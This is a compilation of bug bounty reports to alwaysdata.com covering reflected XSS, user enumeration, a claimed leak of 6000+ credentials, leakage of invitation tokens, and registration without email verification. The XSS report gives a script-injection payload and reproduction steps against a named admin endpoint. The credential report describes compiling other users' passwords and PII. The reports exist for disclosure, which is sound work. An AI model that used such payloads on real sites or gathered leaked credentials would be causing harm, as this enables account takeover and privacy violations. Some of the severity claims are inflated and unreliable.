PoC: By sending a specially crafted request containing the payload redhet"'><script>prompt(document.domain)</script> through the add_participants parameter in the support ticket creation form, we can trigger the XSS vulnerability and execute arbitrary JavaScript in the victim's browser.

Summary:

A reflected XSS vulnerability has been identified in the "add_participants" parameter of the support ticket creation form on admin.alwaysdata.com. This vulnerability allows attackers to inject malicious JavaScript code that will be executed in the victim's browser when they view a vulnerable page.

Vulnerability Details:

Type: Reflected XSS (OWASP A4)

Exploit: Injecting malicious JavaScript through a vulnerable request parameter

Vulnerable URL: https://admin.alwaysdata.com/support/add/

Vulnerable Request: POST /support/add/

Vulnerable Endpoints: The add_participants parameter in the support ticket creation form

Payload: redhet"'><script>prompt(document.domain)</script>

This parameter is used to add participants to a support ticket, but it is not properly sanitized, allowing attackers to inject arbitrary code that will be executed in the browser of any user who views the vulnerable ticket.

## Impact Assessment

1. Impact one: Information Disclosure: The attacker can steal sensitive user information, such as cookies or session IDs, by executing malicious JavaScript within the victim's browser.

2. Impact two: Account Takeover: The attacker could potentially hijack user accounts by tricking them into executing malicious code that grants unauthorized access.

3. Impact three: Defacement: The attacker could manipulate the content displayed on the application by injecting malicious JavaScript that alters the user interface.

## Recommendations

1. Step one: Immediately sanitize all user input: Implement strict input validation and sanitization procedures to prevent the injection of malicious code. This includes escaping special characters and enforcing a Content Security Policy (CSP).

2. Step Two: Patch vulnerable software: Update all relevant software to the latest versions to address known vulnerabilities.

3. Step three: Consider additional security measures: Implement a web application firewall (WAF) to further protect against XSS attacks.

4. Step four:Regularly scan for vulnerabilities: Conduct regular penetration testing and vulnerability scans to identify and address potential security issues.

Impact:

Execution of arbitrary JavaScript code in the victim's browser
Potential for session hijacking, credential theft, or other attacks

## Steps to Reproduce

1. Step one: Access the support ticket creation form at https://admin.alwaysdata.com/support/add/

2. Step two: Enter the following payload in the "add_participants" field: redhet"'><script>prompt(document.domain)</script>

3. Step three: Submit the form.

4. Final step: Observe that the JavaScript code is executed, displaying a prompt with the domain name. (cookies)

Attachments
PoC Video: [Link to video demonstrating the vulnerability]**

## References

[OWASP XSS Prevention Cheat Sheet]: (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

[OWASP XSS Testing Guide]: (https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting)

I hope you will give me a good answer!!

If you have any questions, feel free to ask them ;)

Thank You,

Regards,
Redhet

The application's "Forgot Password" feature allows user enumeration. This is because the application responds with a different message depending on whether the submitted email address is registered or not.
(https://admin.alwaysdata.com/password/lost/)

steps to Reproduce:

Access the "Forgot Password" page.
Enter a random, non-registered email address.
Submit the request.
Observe the response message:

  the message states "There is no account with this email address," which means that user enumeration is possible.
 An attacker could exploit this vulnerability to:

Gather a list of valid user email addresses.
Launch targeted phishing attacks.
Use the information to attempt password guessing or brute force attacks

Remediation:
Implement Generic Response: The application should provide the same response message regardless of whether the email address is registered or not. This prevents attackers from differentiating between valid and invalid accounts.

Additional Notes:

i am aware that this bug is not eligible for a bounty but wanted to bring it to the team's attention.

Best Wishes -Basil

I have identified a Credential Dump that allows unauthorized access to over 6000+ valid user credentials of Alwaysdata.com. This discovery was made in accordance with the Alwaysdata Bug Bounty Program guidelines. I am reporting this issue to ensure the security and privacy of Alwaysdata's users and to assist in prompt remediation.

Sensitive Data at Risk:

The data exposure includes, but is not limited to, vendor and client details, Personally Identifiable Information (PII), Social Security Numbers, medical and financial records, and crucial authentication credentials.

Impact

If exploited by a malicious actor, this vulnerability could lead to:

-Unauthorized access to user accounts.
-Potential compromise of sensitive personal and financial data.
-Secondary attacks using the obtained credentials (credential stuffing, phishing, etc.).
-Damage to the reputation and trustworthiness of the Alwaysdata platform.

Given the scale of the data exposure (6000+ user credentials), the impact is considered highly critical.

Steps to Reproduce :

To access and reproduce the findings related to the data leak, please follow this link: https://phonebook.cz/. It is important to note that an Academia account is required to view the full extent of the data dump. This platform was where I initially discovered the leak of valid credentials.

For your convenience,I've completed the data compilation myself and attached screenshots that capture key aspects of the data leak. Please find below,The attached document containing direct links to the accounts, along with their corresponding emails and passwords. This information was extracted through a manual process, and I've managed to identify at least 30 potential accounts, reviewing their Personally Identifiable Information (PII) among other data.These images should provide a clearer understanding of the issue and assist in verifying the vulnerability.

Proof of Concept
I have attached POC for your reference.I was only able to attach 5 files. If possible,kindly guide me so I can attach more POC's

Remediation Suggestions

To address this vulnerability, I suggest the following immediate and long-term remediation steps:
Revoking current exposed credentials and enforcing a password reset for affected users.
Implementing stricter access controls and regular security audits to prevent similar vulnerabilities.

Confidentiality Agreement

I understand the sensitive nature of this report and agree to keep the details confidential until Alwaysdata has resolved the issue and agreed to disclosure, as per the bug bounty program's guidelines.

I look forward to your prompt response and am willing to provide any further information required for the resolution of this issue.Though the leaked credentials might originate from another application or service,they are your Users and I believe,it is your call to protect the privacy and data of your users.I would greatly appreciate your team's consideration of rewarding this finding, even if it falls outside the typical scope of your program. Thank you for your commitment to security and the opportunity to contribute to the safety of the Alwaysdata platform.

Regards,
Bad_Script3r
Would really appreciate if you could revert on my Email (akhilsocials@gmail.com)
Thanks and Regards.

Summary:
A potential security vulnerability has been identified in the user invitation token generation process when integrated with a third-party service. This vulnerability could lead to the leakage of user invitation tokens, potentially exposing sensitive information and compromising the security of user accounts.

Details:
Vulnerability Type: Information Disclosure
Affected Component: User invitation token generation integrated with third-party service
Severity: High
Description:
During our security assessment, it was discovered that the user invitation token, which is generated as part of the user invitation process, is not adequately protected when interacting with a third-party service. This oversight allows unauthorized access to the token, leading to potential exposure of sensitive information.

Steps to Reproduce:
1.Login into the account.
2.Go to the invite user function and add the email which you want to invite.
3.A token is received to that email for joining the team.
4.Keep your proxy on and click on the invitation link.
5.Set the password and you have successfully joined the team.
6.Now go back to your burp suite and search for the invitation token which is received on the step3.
7.You will notice that the token got leaked into third parties also.

Impact:
If exploited, this vulnerability could allow an attacker to gain unauthorized access to user accounts, potentially leading to data theft, unauthorized access to sensitive information, and other malicious activities.

Recommendations for Mitigation:

Token Encryption: Implement encryption mechanisms to protect user invitation tokens during transmission to and from the third-party service.
Secure Transmission: Ensure that communication channels between your system and the third-party service are secure, using protocols such as HTTPS.
Token Expiry: Implement token expiration mechanisms to limit the window of opportunity for exploitation.
Audit Access Logs: Regularly audit access logs for any suspicious activities or unauthorized access.

Proof of Concept (PoC):
Include relevant information or details demonstrating the vulnerability, ensuring that no sensitive information is disclosed in the report.

I appreciate your prompt attention to this matter and look forward to working collaboratively to address and resolve this security vulnerability.

Thank you.

Aditya

I am writing to report a security vulnerability that I discovered on the Alwaysdata.com platform regarding unverified email registration. This vulnerability allows users to create new accounts without verifying their email addresses, posing a significant risk to the security and integrity of the platform and its users.

Below are the details of the vulnerability along with steps to reproduce, its impact, severity, and proposed solution:

Vulnerability Details:

Vulnerability Type: Unverified Email Registration
Website: https://www.alwaysdata.com/ Steps to Reproduce:

Visit the Alwaysdata.com website.
Navigate to the account registration page.
Enter any email address (valid or invalid) without going through email verification.
Complete the registration process without receiving or verifying any email confirmation.
Impact:

Account Takeover: Malicious actors can create accounts using others' email addresses and gain unauthorized access to their accounts or personal information.
Spam and Abuse: Unverified accounts can be used to send spam, phishing emails, or engage in other abusive activities on the platform.
Impersonation: Attackers can impersonate legitimate users or organizations by creating accounts with their email addresses.

Proposed Solution:
To mitigate this vulnerability, I recommend implementing email verification as a mandatory step during the registration process. This would involve sending a verification email with a unique code or link that users must confirm before their accounts are activated.

Additionally, consider implementing rate limiting or other measures to prevent abuse of the registration process and ensure that users' accounts and data are protected from unauthorized access and misuse.

I believe that addressing this vulnerability promptly will help enhance the security and trustworthiness of the Alwaysdata.com platform and protect its users from potential harm.

Please let me know if you require any further information or assistance in resolving this issue. I am committed to assisting you in any way possible to ensure the security of the platform and its users.

Thank you for your attention to this matter, and I look forward to your prompt response.